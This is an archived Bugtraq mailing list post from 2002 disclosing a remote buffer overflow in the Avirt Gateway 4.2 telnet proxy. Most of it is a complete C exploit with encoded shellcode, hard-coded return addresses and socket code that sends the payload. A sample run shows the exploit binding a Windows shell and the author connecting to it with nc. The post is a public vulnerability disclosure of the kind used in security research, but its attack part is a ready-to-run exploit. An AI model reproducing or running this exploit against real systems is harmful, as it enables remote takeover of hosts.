Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Avirt Gateway 4.2 remote buffer overflow: proof of concept

From: uid0x00 <uid0x00 () haked com>
Date: Tue, 12 Feb 2002 22:17:53 +0100
Avirt Gateway 4.2  remote buffer overflow: proof of concept

Release Date:
February 12, 2002

Systems tested:
Avirt Gateway v4.2 [build 4807] on Windows 2000, SP2

These products can be found at vendor Avirt's web site:
http://www.avirt.com

Description:
The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely exploitable buffer overflow which allows execution of arbitrary code. Entering a String of about 510bytes at the „Ready>“ prompt will overwrite EIP. 
Exploit will bind a shell to a specified port on the attacked host.

Example:
bash-2.05$ agate 10.0.0.1 7007

Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00 () haked com)

initialising socket
...initialized
trying to connect
...connected
(waiting)
sending exploit
...sent
(waiting)
...closed
shell bound to port 7007
bash-2.05$ nc -v target 7007
target [10.0.0.1] 7007 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>


Exploit:
----------------------------------------------------------------------------cut-----------------------------------------------------------------------------------
/* agate.c by uid0x00
 * Avirt Gateway 4.2 remote exploit
 * compile with gcc agate.c -o agate
 *
 * tested with win2k, sp2
 *
 * thx to ByteRage, exploit is based on his shellcode
 */

/* Set the following three defines according to the DLL we use */

// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

#include <stdio.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
  int s;
  struct sockaddr_in SockAdr;
  char exploit[1024];
  unsigned short int      a_port;

  char shellcode[] =

/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code (thx for your help man!) */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";

/* ==== SHELLC0DE ENDS ==== */
printf("\nAvirt Gateway 4.2 remote exploit by uid0x00 (uid0x00 () haked com)\n\n"); 

  if(argc < 3) {
    printf("usage:\t%s <ip#> <port#>\n", argv[0]);
    return 0;
  }

  //insert shell port
  a_port = htons(atoi(argv[2]));
  a_port^= 0x9999;
  shellcode[964] = (a_port) & 0xff;
  shellcode[965] = (a_port >> 8) & 0xff;

  //init the exploit buffer
  memset(&exploit, '\xCC', 0x200);
  memcpy(&exploit, &shellcode, sizeof(shellcode)-1);

  printf("initialising socket\n");
  s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
  if (s) {
    printf("...initialized\n");

    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(23);

    printf("trying to connect\n");
    if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
      printf("...connected\n");
      printf("(waiting)\n");
      sleep(3);

      printf("sending exploit\n");
      send(s, exploit, sizeof(exploit), 0);
      printf("...sent\n");

      printf("(waiting)\n");
      sleep(3);

      printf("...closed\nshell bound to port %s \n", argv[2]);
      close(s);
    }
    else {
      printf("... failed :( errno = %i\n", errno);
      close(s);
      return(0);
    }
  }
}
----------------------------------------------------------------------------cut-----------------------------------------------------------------------------------

Disclaimer:
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Copyright Information:
Permission is hereby granted for the redistribution of this paper
electronically. It is not to be edited in any way without express consent of
the author. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail uid0x00 () haked com for
permission.

uid0x00
EOF
Previous By Date Next
Previous By Thread Next

Current thread: